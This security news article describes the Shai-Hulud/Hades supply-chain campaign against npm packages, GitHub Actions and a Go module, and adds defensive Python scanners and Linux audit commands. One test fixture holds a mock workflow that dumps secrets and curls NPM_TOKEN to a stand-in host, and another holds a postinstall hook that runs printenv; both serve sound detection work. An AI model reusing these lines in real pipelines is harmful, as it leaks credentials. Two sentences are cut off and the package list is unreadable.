Supply Chain Nightmare Returns: Shai-Hulud Malware Expands From npm Packages Into Go Ecosystem With New Developer Credential Theft Campaign, Dark Web recent claims + Video


A New Wave of Developer-Focused Malware Threatens the Software Supply Chain

The software development world is facing another dangerous evolution of a supply chain attack that targets the very tools developers trust every day. Cybersecurity researchers have uncovered a renewed campaign linked to the Mini Shai-Hulud, Miasma, and Hades malware family, showing that attackers are no longer focusing only on traditional vulnerabilities. Instead, they are turning legitimate package ecosystems, automation pipelines, cloud credentials, and developer environments into weapons.

This latest campaign demonstrates a growing reality in modern cybersecurity: developers themselves have become a prime target. A single stolen npm publishing token, GitHub credential, or CI/CD secret can provide attackers with access to thousands of downstream users and organizations.

The campaign has now expanded beyond the npm ecosystem and reached the Go programming environment through a compromised blockchain-related project. Researchers warn that the attackers are continuing to refine their techniques, changing indicators, hiding their activity, and abusing trusted workflows to avoid detection.

The Shai-Hulud Malware Family Continues Its Evolution

Security researchers have identified a new wave of malicious package activity involving compromised npm releases connected to LeoPlatform and RStreams projects. According to researchers, the operation also includes abuse of GitHub Actions workflows and a related compromise involving the Verana Blockchain Go module.

The main objective remains consistent with previous Shai-Hulud campaigns: steal developer credentials, collect sensitive tokens, and use those secrets to spread further through package registries, repositories, and software development pipelines.

Unlike traditional malware campaigns that attack end users directly, this operation focuses on developers who often have elevated access to company infrastructure, cloud environments, and source code repositories.

Compromised npm Packages Reveal a Wider Supply Chain Attack

The attackers distributed malicious versions of multiple npm packages, including:

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

The campaign also affected:

github.com/verana-labs/[email protected]

The affected packages show that attackers specifically targeted developer tools, cloud integrations, serverless systems, and backend infrastructure components where stolen credentials could provide maximum access.

Stolen npm Credentials Allowed Rapid Malware Deployment

Researchers suspect that an npm developer account associated with LeoPlatform was compromised through leaked credentials. The attacker allegedly used the stolen npm publishing token belonging to the maintainer to upload infected packages.

The malicious releases appeared within an extremely short timeframe, suggesting that attackers were monitoring developer accounts and waiting for an opportunity to inject malicious code quickly before security teams could react.

This method highlights a major weakness in open-source ecosystems: package trust is often inherited from reputation. When a trusted maintainer account becomes compromised, users may unknowingly install malware because the package name and ownership appear legitimate.

Malware Uses Advanced Installation Techniques

One of the most concerning aspects of this campaign is how the malware avoids relying only on traditional npm lifecycle scripts.

Instead, the attackers used a file called binding.gyp to trigger arbitrary code execution during installation. This allowed the malicious package to launch a JavaScript loader that downloads and installs the Bun runtime if necessary.

After preparing the environment, the malware executes its information-stealing payload designed to collect:

Developer credentials

Authentication tokens

Cloud access keys

Repository secrets

Package publishing credentials

CI/CD environment data

This approach allows attackers to bypass some security controls because the malicious behavior is hidden inside a build-related process rather than an obvious installation command.
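To show what the implicit trigger looks like from the defender's side, here is an added example (it is not code from the original article, nor from any project named in it) that walks a node_modules tree and reports both explicit lifecycle hooks and the implicit one: when a package ships a binding.gyp and declares no install or preinstall script, npm defaults the install step to `node-gyp rebuild`, so the gyp file itself, and any build "actions" it declares, runs during installation. The package names in the fixture are made up; the list of commands treated as suspicious is this example's own choice.

```python
import json
import re
import tempfile
from pathlib import Path

# Scripts npm runs on its own during `npm install` (no user action needed).
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Commands that rarely belong in the install step of a library package
# (assumption of this example, not a list from the article).
SUSPICIOUS_CMD = re.compile(
    r"\b(curl|wget|bun|child_process|eval|base64|powershell)\b", re.IGNORECASE
)


def audit_package_dir(pkg_dir):
    """Return findings for one installed package (the directory holding package.json)."""
    findings = []
    manifest = pkg_dir / "package.json"
    if not manifest.is_file():
        return findings
    try:
        meta = json.loads(manifest.read_text(encoding="utf-8"))
    except (json.JSONDecodeError, UnicodeDecodeError):
        return ["%s: unreadable package.json" % pkg_dir.name]
    name = meta.get("name", pkg_dir.name)
    scripts = meta.get("scripts") or {}

    # 1. Explicit hooks: declared in package.json, so at least reviewable.
    for hook in LIFECYCLE_HOOKS:
        cmd = scripts.get(hook)
        if cmd:
            tag = "suspicious" if SUSPICIOUS_CMD.search(cmd) else "present"
            findings.append("%s: %s script %s: %s" % (name, hook, tag, cmd))

    # 2. Implicit hook: with a binding.gyp and no install/preinstall script,
    #    npm defaults the install step to `node-gyp rebuild`, so the gyp
    #    file itself (and any "action" it declares) becomes the trigger.
    gyp = pkg_dir / "binding.gyp"
    if gyp.is_file() and not (scripts.get("install") or scripts.get("preinstall")):
        findings.append("%s: binding.gyp present, implicit node-gyp rebuild on install" % name)
        text = gyp.read_text(encoding="utf-8", errors="replace")
        if re.search(r'"action"\s*:\s*\[', text) or SUSPICIOUS_CMD.search(text):
            findings.append("%s: binding.gyp declares build actions or commands, review it" % name)
    return findings


def audit_node_modules(root):
    """Walk a node_modules tree, including @scoped and nested packages."""
    findings = []
    for manifest in sorted(Path(root).rglob("package.json")):
        pkg_dir = manifest.parent
        parent = pkg_dir.parent
        # Only real package roots: node_modules/<pkg> or node_modules/@scope/<pkg>.
        is_pkg = parent.name == "node_modules" or (
            parent.name.startswith("@") and parent.parent.name == "node_modules"
        )
        if is_pkg:
            findings.extend(audit_package_dir(pkg_dir))
    return findings


def build_sample_tree(base):
    """Constructed fixture (made-up package names): one clean package, one with a
    suspicious postinstall, one that relies on binding.gyp with no install script."""
    nm = Path(base) / "node_modules"
    clean = nm / "left-pad-clone"
    clean.mkdir(parents=True)
    (clean / "package.json").write_text(json.dumps(
        {"name": "left-pad-clone", "version": "1.0.0", "scripts": {"test": "node test.js"}}))
    hooked = nm / "@acme" / "hooked"
    hooked.mkdir(parents=True)
    (hooked / "package.json").write_text(json.dumps(
        {"name": "@acme/hooked", "version": "2.0.0",
         "scripts": {"postinstall": "node -e \"require('child_process').execSync('printenv')\""}}))
    native = nm / "native-ish"
    native.mkdir(parents=True)
    (native / "package.json").write_text(json.dumps({"name": "native-ish", "version": "0.3.0"}))
    (native / "binding.gyp").write_text(json.dumps({"targets": [{
        "target_name": "noop",
        "actions": [{"action_name": "stage", "inputs": [], "outputs": ["stage.txt"],
                     "action": ["node", "loader.js"]}]}]}))
    return nm


def run_demo():
    """Build the fixture in a temp dir and return the audit findings."""
    return audit_node_modules(build_sample_tree(tempfile.mkdtemp()))


if __name__ == "__main__":
    for line in run_demo():
        print(line)
```

Run it against a real checkout by calling `audit_node_modules("node_modules")`; the implicit-hook finding is the one a script-only review misses, because nothing in the package.json `scripts` block reveals it.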

GitHub Actions Become a New Battlefield

The campaign also abuses GitHub Actions, one of the most widely used automation platforms in modern software development.

The malware creates a workflow named “Run Copilot” designed to capture secrets stored inside CI/CD runners. These environments often contain powerful credentials because they are responsible for automatically building, testing, and deploying applications.

The stolen information is reportedly uploaded to public GitHub repositories acting as temporary storage locations. One repository description identified during the investigation was:

Alright Lets See If This Works.

The attackers also used GitHub as a dead-drop communication system, allowing malware to retrieve commands and additional payloads without relying on traditional command-and-control servers.
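As an added example (not code from the article or from GitHub), the following scanner reviews the workflow files in .github/workflows for the two things this section describes: a workflow carrying the reported “Run Copilot” name, and run steps that serialize the secrets context or the runner environment or hand a secret to a network client. It parses `run:` steps line by line, including `|` block scalars, so it needs no YAML library; the detection patterns (toJSON(secrets), printenv, curl with a secrets reference) and the two fixture workflows are this example's own constructions.

```python
import re
import tempfile
from pathlib import Path

# A `run:` key, optionally inside a `- ` list item, with inline text or a block indicator.
RUN_RE = re.compile(r"^(?P<indent>\s*)(?P<dash>-\s+)?run:\s*(?P<rest>.*)$")
# Ways a step can serialize every secret or the whole runner environment (assumed patterns).
SECRET_DUMP = re.compile(r"toJSON\(\s*secrets\s*\)|\bprintenv\b|\benv\s*>|\bset\s*>")
# Network clients commonly used to move data off a runner.
NET_CLIENT = re.compile(r"\bcurl\b|\bwget\b|\bnc\b|Invoke-WebRequest", re.IGNORECASE)
SECRET_REF = re.compile(r"secrets\.\w+")
# Workflow name reported for this campaign in the write-up above.
KNOWN_BAD_NAMES = {"run copilot"}


def workflow_name(text):
    """Top-level `name:` of the workflow (column 0), quotes stripped, or None."""
    for line in text.splitlines():
        m = re.match(r'^name:\s*["\']?(.*?)["\']?\s*$', line)
        if m:
            return m.group(1)
    return None


def extract_run_steps(text):
    """Collect the shell text of every `run:` step, handling `|`/`>` block scalars."""
    lines = text.splitlines()
    steps, i = [], 0
    while i < len(lines):
        m = RUN_RE.match(lines[i])
        if not m:
            i += 1
            continue
        rest = m.group("rest").strip()
        if rest and rest[0] not in "|>":
            steps.append(rest)            # single-line run
            i += 1
            continue
        # Block scalar: body lines are indented deeper than the `run` key itself.
        key_indent = len(m.group("indent")) + len(m.group("dash") or "")
        body, i = [], i + 1
        while i < len(lines):
            line = lines[i]
            if line.strip() and len(line) - len(line.lstrip()) <= key_indent:
                break
            body.append(line.strip())
            i += 1
        steps.append("\n".join(b for b in body if b))
    return steps


def audit_workflow(path):
    """Return findings for one workflow file."""
    p = Path(path)
    text = p.read_text(encoding="utf-8", errors="replace")
    findings = []
    name = workflow_name(text)
    if name and name.strip().lower() in KNOWN_BAD_NAMES:
        findings.append("%s: workflow name '%s' matches a known campaign indicator" % (p.name, name))
    for idx, step in enumerate(extract_run_steps(text), 1):
        if SECRET_DUMP.search(step):
            findings.append("%s: step %d serializes secrets or the runner environment" % (p.name, idx))
        if SECRET_REF.search(step) and NET_CLIENT.search(step):
            findings.append("%s: step %d passes a secret to a network client" % (p.name, idx))
    return findings


def audit_workflows_dir(workflows_dir):
    findings = []
    for p in sorted(Path(workflows_dir).iterdir()):
        if p.suffix in (".yml", ".yaml"):
            findings.extend(audit_workflow(p))
    return findings


# Constructed fixtures: an ordinary CI workflow and one shaped like the reported abuse.
CLEAN_WORKFLOW = """\
name: CI
on: [push]
jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - run: npm ci
      - name: Unit tests
        run: |
          npm test
          npm run lint
"""

SUSPECT_WORKFLOW = """\
name: "Run Copilot"
on: [push]
jobs:
  copilot:
    runs-on: ubuntu-latest
    steps:
      - run: echo '${{ toJSON(secrets) }}' > /tmp/ctx.json
      - name: report
        run: |
          curl -s -d "${{ secrets.NPM_TOKEN }}" https://example.invalid/collect
"""


def run_demo():
    """Write both fixtures into a temp .github/workflows and audit them."""
    d = Path(tempfile.mkdtemp()) / ".github" / "workflows"
    d.mkdir(parents=True)
    (d / "ci.yml").write_text(CLEAN_WORKFLOW)
    (d / "run-copilot.yml").write_text(SUSPECT_WORKFLOW)
    return audit_workflows_dir(d)
```

The name match is the weakest signal, since the attackers can rename the workflow at will; the step-level checks survive a rename and are the ones worth wiring into a pre-merge review of any commit that touches .github/workflows.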

The Hades Connection Reveals a Larger Malware Operation

Researchers discovered that the campaign is connected to the Hades malware variant through GitHub polling behavior.

The malware checks GitHub repositories hourly for commits containing the string “firedalazer.” When discovered, the malware retrieves and executes additional malicious components.

This technique demonstrates how attackers are increasingly blending legitimate platforms with malicious operations. Instead of hosting obvious malware infrastructure, threat actors hide communication inside popular services such as GitHub.

Russian Locale Detection and Security Avoidance

The malware includes several defensive mechanisms designed to reduce detection.

Researchers observed:

Russian locale-based execution restrictions

Endpoint security software detection

Encrypted credential theft

GitHub-based command retrieval

Automated propagation attempts

The inclusion of a Russian locale killswitch suggests the attackers may attempt to avoid targeting specific environments or reduce attention from certain security researchers.

The Attack Moves Beyond npm Into Go Projects

The compromise of the Verana Blockchain Go module represents an important change in the campaign.

Previously, the malware focused heavily on npm packages. However, the move into the Go ecosystem demonstrates that attackers are expanding their reach across programming languages.

Unlike npm attacks, the Go compromise does not depend on package installation hooks. Instead, researchers believe the malware can activate through source repository interactions, developer IDE usage, or AI coding assistant environments.

This creates a broader threat because modern developers increasingly interact with code through automated tools that may analyze, clone, or execute project files.

Deep Analysis: Linux Security Commands Developers Should Use Against Supply Chain Malware

Linux Command: Checking Suspicious Package Installations

Developers should regularly inspect installed packages and recently modified files:

npm list --depth=0

This command helps identify unexpected dependencies.

find . -type f -mtime -1

This searches for files modified within the last day.

Linux Command: Searching For Suspicious Scripts

Malicious packages often hide execution commands inside scripts.

grep -R -E "curl|wget|child_process|exec" .

This searches project files for common malware behaviors.

Linux Command: Monitoring Network Connections

Credential stealers often communicate externally.

netstat -tunap

or:

ss -tunap

These commands reveal active network connections.

Linux Command: Checking Running Processes

ps aux --sort=-%cpu

Unexpected processes consuming resources may indicate compromise.

Linux Command: Auditing Git Changes

git log --stat

Developers should review unusual commits, especially those involving automation workflows.

Linux Command: Checking Environment Secrets

env | sort

This helps identify exposed environment variables.

Linux Command: Searching GitHub Action Files

find .github -type f \( -name "*.yml" -o -name "*.yaml" \)

Automation files should be reviewed regularly.

Linux Command: Detecting Suspicious npm Hooks

grep -A 10 '"scripts"' package.json

Developers should inspect installation scripts carefully.

Linux Command: File Integrity Monitoring

sha256sum package-lock.json

Unexpected checksum changes may indicate tampering.

Linux Command: Checking Installed Global npm Packages

npm list -g --depth=0

Global packages often have powerful permissions.

Linux Command: Searching Hidden Files

find . -mindepth 1 -name ".*"

Attackers frequently hide payloads inside hidden directories.
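The package-installation and file-integrity checks above are one-liners that need a human to interpret them. As an added example (not code from the article or from npm), the script below does the same two jobs in a form that can run in CI: it reads package-lock.json (lockfile versions 1, 2 and 3), compares every installed name@version against a blocklist, flags packages resolved from somewhere other than registry.npmjs.org or marked `hasInstallScript`, and compares the lockfile's SHA-256 against a recorded baseline. The blocklist entries and the sample lockfile are placeholders; the real list of affected releases is the one the article reports.

```python
import hashlib
import json
import tempfile
from pathlib import Path
from urllib.parse import urlparse

# Placeholder blocklist (made-up entries). Substitute the published package@version
# list for the campaign here.
BLOCKLIST = {"example-compromised-pkg@1.2.3", "@example-scope/helper@4.5.6"}
TRUSTED_REGISTRY_HOSTS = {"registry.npmjs.org"}


def installed_packages(lock):
    """Map 'name@version' -> lock entry for lockfileVersion 1, 2 and 3."""
    found = {}
    packages = lock.get("packages")
    if isinstance(packages, dict):
        # v2/v3: entries keyed by install path; "" is the project itself.
        for path, entry in packages.items():
            if "node_modules/" not in path:
                continue
            name = entry.get("name") or path.rsplit("node_modules/", 1)[1]
            found["%s@%s" % (name, entry.get("version", "?"))] = entry
        return found

    def walk(deps):  # v1: nested "dependencies" tree
        for name, entry in (deps or {}).items():
            found["%s@%s" % (name, entry.get("version", "?"))] = entry
            walk(entry.get("dependencies"))

    walk(lock.get("dependencies"))
    return found


def audit_lockfile(lock, blocklist=BLOCKLIST):
    """Flag blocklisted versions, non-registry sources and packages with install scripts."""
    findings = []
    for key, entry in installed_packages(lock).items():
        if key in blocklist:
            findings.append("blocked: %s" % key)
        resolved = entry.get("resolved")
        if resolved:
            host = urlparse(resolved).hostname or ""
            if host not in TRUSTED_REGISTRY_HOSTS:
                findings.append("untrusted source: %s <- %s" % (key, resolved))
        if entry.get("hasInstallScript"):
            findings.append("install script: %s" % key)
    return findings


def lockfile_digest(path):
    """SHA-256 of the lockfile bytes; record this as the baseline after a review."""
    return hashlib.sha256(Path(path).read_bytes()).hexdigest()


def integrity_changed(path, baseline_digest):
    return lockfile_digest(path) != baseline_digest


SAMPLE_LOCK = {  # constructed lockfileVersion 3 fragment with made-up packages
    "name": "demo-app",
    "lockfileVersion": 3,
    "packages": {
        "": {"name": "demo-app", "version": "0.1.0"},
        "node_modules/left-pad-clone": {
            "version": "1.3.0",
            "resolved": "https://registry.npmjs.org/left-pad-clone/-/left-pad-clone-1.3.0.tgz"},
        "node_modules/example-compromised-pkg": {
            "version": "1.2.3",
            "resolved": "https://registry.npmjs.org/example-compromised-pkg/-/example-compromised-pkg-1.2.3.tgz",
            "hasInstallScript": True},
        "node_modules/@example-scope/helper": {
            "version": "4.5.6",
            "resolved": "https://cdn.example.invalid/helper-4.5.6.tgz"},
    },
}


def run_demo():
    """Write the sample lock, record a baseline, tamper with it, report both checks."""
    lock_path = Path(tempfile.mkdtemp()) / "package-lock.json"
    lock_path.write_text(json.dumps(SAMPLE_LOCK, indent=2))
    baseline = lockfile_digest(lock_path)
    tampered = json.loads(lock_path.read_text())
    tampered["packages"]["node_modules/left-pad-clone"]["version"] = "1.3.1"
    lock_path.write_text(json.dumps(tampered, indent=2))
    return {"findings": audit_lockfile(SAMPLE_LOCK),
            "changed": integrity_changed(lock_path, baseline)}
```

A digest mismatch on its own only says the lockfile moved; pairing it with the blocklist and source checks tells you whether the move pulled in a release you would refuse to install.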

What Undercode Say:

The latest Shai-Hulud evolution represents a fundamental change in how cybercriminal groups approach software attacks. The biggest danger is not simply the malware payload itself, but the strategy behind it.

Attackers understand that modern software development depends heavily on trust. Developers trust package names, maintainers, automation systems, and open-source communities. This trust creates an opportunity where one compromised account can become a distribution channel.

The campaign also shows that supply chain attacks are becoming increasingly ecosystem-independent. The attackers are not committed to npm alone. They are moving wherever developers work.

The expansion into Go demonstrates that attackers are studying developer habits rather than individual technologies. The target is not a programming language. The target is the workflow surrounding software creation.

The abuse of GitHub Actions is particularly concerning because CI/CD environments often contain some of the most valuable secrets in an organization. A developer laptop compromise is dangerous, but a compromised build pipeline can become a company-wide incident.

The use of Bun as part of the malware execution chain shows how attackers are adapting to modern development trends. New tools designed for performance and productivity can also become attractive components for malicious automation.

The

The traditional security mindset of protecting servers is no longer enough. Organizations must protect developers, repositories, package publishing accounts, and automation workflows.

Strong identity protection is now as important as traditional endpoint security.

Multi-factor authentication for package registries should become standard practice.

Short-lived tokens should replace permanent credentials whenever possible.

Organizations should treat third-party packages as external software dependencies requiring continuous monitoring.

The open-source ecosystem remains one of

The Shai-Hulud campaign proves that cybersecurity is moving toward a new battlefield: the software creation process itself.

✅ The malware campaign targets npm packages and developer ecosystems.
Researchers have identified malicious releases affecting multiple npm packages and developer workflows.

✅ The campaign includes GitHub Actions abuse and credential theft techniques.
The malware attempts to steal CI/CD secrets, repository tokens, and authentication data.

❌ The full identity and motivation of the attackers remain publicly unconfirmed.
Researchers have connected technical indicators but have not publicly confirmed a specific threat actor.

Prediction

(+1) Software supply chain security will receive increased investment as organizations realize developer environments are high-value targets.

(+1) More companies will adopt stronger npm security controls, token restrictions, and automated dependency monitoring.

(+1) AI coding environments will likely introduce stronger sandboxing and security verification features.

(-1) Attackers will continue targeting open-source ecosystems because one compromised package can reach thousands of organizations.

(-1) Smaller open-source maintainers may remain vulnerable due to limited security resources.

(-1) Supply chain attacks will likely become more complex as criminals move across multiple programming ecosystems instead of focusing on one platform.

References:

Reported By: thehackernews.com